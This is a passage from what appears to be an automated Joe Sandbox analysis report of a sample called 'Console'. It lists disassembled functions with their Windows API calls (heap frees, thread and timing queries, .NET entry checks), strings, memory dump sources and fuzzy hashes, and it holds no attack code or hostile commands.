                                                                                                                                                                                                                          • Opcode ID: 230624109fc8d9ff201e00c5b72edb4b37b050c8724b6127e065c9f57edbd91b
                                                                                                                                                                                                                          • Instruction ID: e6efe3afd1054b0fcdb9fd0c00d16ae637b0a23e809114e7bc0d9cbe204a865c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 230624109fc8d9ff201e00c5b72edb4b37b050c8724b6127e065c9f57edbd91b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8EC1BEB5E1421A9BDB14CF94DE96BEEBBB4FF48320F18011DE801B7280D7755944EBA4
                                                                                                                                                                                                                          Function 00FE3420 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 139stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(_CorDllMain,?,?,?), ref: 00FE351F
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(__CorDllMain@12,?), ref: 00FE3532
                                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000006,00000000,?), ref: 00FE354E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: strcmp$HandleModule
                                                                                                                                                                                                                          • String ID: _CorDllMain$__CorDllMain@12
                                                                                                                                                                                                                          • API String ID: 3386726176-1519268716
                                                                                                                                                                                                                          • Opcode ID: bc070265144d5eaa7b375d175a3eb7be436f61ee7fba5aebb918201484b4f09e
                                                                                                                                                                                                                          • Instruction ID: 316979d1529c1547c36113533c207a2947de33866d9c9749f418f84177181398
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc070265144d5eaa7b375d175a3eb7be436f61ee7fba5aebb918201484b4f09e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31514B31F0024A9FDB15CF5AD988B6AB7F4AF44318F1841A8D908EB342D771EE419B90
                                                                                                                                                                                                                          Function 010D4370 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 134threadCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 010D43A0
                                                                                                                                                                                                                          • SleepEx.KERNEL32(000000FF,00000000), ref: 010D43EE
                                                                                                                                                                                                                            • Part of subcall function 01097580: GetStdHandle.KERNEL32(000000F4,00000000,?), ref: 0109758C
                                                                                                                                                                                                                            • Part of subcall function 01097580: strlen.API-MS-WIN-CRT-STRING-L1-1-0(Fatal error. ), ref: 01097596
                                                                                                                                                                                                                            • Part of subcall function 01097580: WriteFile.KERNEL32(00000000,Fatal error. ,00007FFF,?,00000000,00000000), ref: 010975C5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Fatal error while logging another fatal error., xrefs: 010D43BD
                                                                                                                                                                                                                          • Process terminated. , xrefs: 010D4468
                                                                                                                                                                                                                          • Fatal error. , xrefs: 010D4463
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentFileHandleSleepThreadWritestrlen
                                                                                                                                                                                                                          • String ID: Fatal error while logging another fatal error.$Fatal error. $Process terminated.
                                                                                                                                                                                                                          • API String ID: 3820310217-2540833051
                                                                                                                                                                                                                          • Opcode ID: ce18ed0123609ff1623197ce7aa11d757a11b80913fa7dcb52ec9a2066333cc0
                                                                                                                                                                                                                          • Instruction ID: 2ad112e11c4030fd7c3503fc17022fadc76bc8f730f71adbf00ab9e34d0739c8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce18ed0123609ff1623197ce7aa11d757a11b80913fa7dcb52ec9a2066333cc0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6751AB31A01249DBCF14EFA8C950BAEFBB0FF54320F20416ED946AB780EB745A05CB91
                                                                                                                                                                                                                          Function 0108C0A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,00000000,?,?), ref: 0108C0AF
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0108C0B9
                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,?,00000000,?,?), ref: 0108C0C9
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0108C0D1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Current$CountCounterPerformanceProcessQueryThreadTick
                                                                                                                                                                                                                          • String ID: 7
                                                                                                                                                                                                                          • API String ID: 1503542204-1790921346
                                                                                                                                                                                                                          • Opcode ID: 39410776e184ace938af3063c46db29885a59152ec7d48e075d63eb74f25e68f
                                                                                                                                                                                                                          • Instruction ID: 50f931df7becf3193f80aa5cf38d72728a8589f1a1d4b3883a334e942abc2da6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39410776e184ace938af3063c46db29885a59152ec7d48e075d63eb74f25e68f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E621BEB6A00216DBDB04DFB8C5887C9BBF8FB09315F10427AD959E3390E774A9148B90
                                                                                                                                                                                                                          Function 012B9650 Relevance: 7.8, APIs: 4, Strings: 1, Instructions: 330memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012B99AA
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012B99F7
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012B9AB7
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012B9AD9
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          • Opcode ID: 53cbc7b220ab63d2d9558bd2ffe352a84aa11184eeabd3ff2414f59685802362
                                                                                                                                                                                                                          • Instruction ID: 9a7724e77c24ecac2fc96dbd75a8c6f54f226312b0f3a883a2863aa7ac3fed0a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 53cbc7b220ab63d2d9558bd2ffe352a84aa11184eeabd3ff2414f59685802362
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5D172B191011A9BDF35CF24CC81BEAB7B8AF18344F0441E9EA49A7241E770AED5CF90
                                                                                                                                                                                                                          Function 012BA050 Relevance: 7.8, APIs: 4, Strings: 1, Instructions: 325memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BA39A
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BA3E7
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BA49D
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BA4BF
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          • Opcode ID: 0d12c2b152062b040d9d4a0b53b90582580b97851bf59acfde378eabf7a1f29d
                                                                                                                                                                                                                          • Instruction ID: 88bbd44ac87bc9c176f8cde635c999e61ac33f519205ebba754b9e2453830c46
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d12c2b152062b040d9d4a0b53b90582580b97851bf59acfde378eabf7a1f29d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1D1937591022A9FDB35CF24DC81FEAB7B8AF14344F0541E9EA49A7241E771AE84CF90
                                                                                                                                                                                                                          Function 012C5610 Relevance: 7.8, APIs: 4, Strings: 1, Instructions: 325memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C595A
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C59A7
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C5A5D
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C5A7F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          • Opcode ID: 5f9151a3bdb1dc030abf5d294cda1c22b72609894e3ed2bb92e6d20a2b49328b
                                                                                                                                                                                                                          • Instruction ID: 59f5369b401edc9c08169034d3dfbf974958ad93bc19bd03a510d7e9d8151047
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f9151a3bdb1dc030abf5d294cda1c22b72609894e3ed2bb92e6d20a2b49328b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19D18575A1021A9FDB35CF14DC81BEAB7B8AF14704F0542EDEA49A7241E770AE84CF90
                                                                                                                                                                                                                          Function 012BF950 Relevance: 7.8, APIs: 4, Strings: 1, Instructions: 324memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BFBE7
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BFCD4
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BFD8D
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BFDAF
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          • Opcode ID: ad132196fb841a2e75fca6ea82010a919d945dc047a2f092b75061c9a78b2555
                                                                                                                                                                                                                          • Instruction ID: 5eeffe000d52339963c2fdb7dd3ae6dc8e078773e653b64b92a55d83a77da038
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad132196fb841a2e75fca6ea82010a919d945dc047a2f092b75061c9a78b2555
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0CD1AE71A102199FDB20CF64DC85FDAB7B9AF14304F4441EAEA09E7291EB709E94CF91
                                                                                                                                                                                                                          Function 012C89E0 Relevance: 7.8, APIs: 4, Strings: 1, Instructions: 324memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C8C77
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C8D64
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C8E1D
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C8E3F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          • Opcode ID: 9c6ce5f542f1349f0c4ec0baadb32e1ea65437a3a7d177b907163105a2f99836
                                                                                                                                                                                                                          • Instruction ID: 9f88b2dbaac85bc43b108f66b9d43ba7fc848620f6db5e69cdbf473a82c365e6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c6ce5f542f1349f0c4ec0baadb32e1ea65437a3a7d177b907163105a2f99836
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26D19F71A102199FDB20CB64DC45FDAB7B9AF14704F4442EEEA09E7251E730AE84CF91
                                                                                                                                                                                                                          Function 012BD8C0 Relevance: 7.8, APIs: 4, Strings: 1, Instructions: 279memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BDB65
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BDBB2
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BDC72
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BDC94
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          • Opcode ID: 7722f8e3f7911dd3bd8084b2919b54fc99bb5cfb425059329a8c0f1e2cfe8972
                                                                                                                                                                                                                          • Instruction ID: 245656eda4f9acf8ce7abb4a8d79264ccb2f89302dfa5c259af76dcc437f91dc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7722f8e3f7911dd3bd8084b2919b54fc99bb5cfb425059329a8c0f1e2cfe8972
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CAB181719102199BDB20CF68CC90FEAB7B9BF14344F4441EAEA0DA7251E7709A84CF91
                                                                                                                                                                                                                          Function 012C66A0 Relevance: 7.8, APIs: 4, Strings: 1, Instructions: 252memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C68DF
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C692C
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C69E2
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C6A04
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          • Opcode ID: 20e24c2e589398751ba277bb8e0b5685de5050079cec92580c73932bac94382f
                                                                                                                                                                                                                          • Instruction ID: 1154eb1791a8aa8b2e79fd92ef8a63f7eddabfaea4971364c272b409b192552a
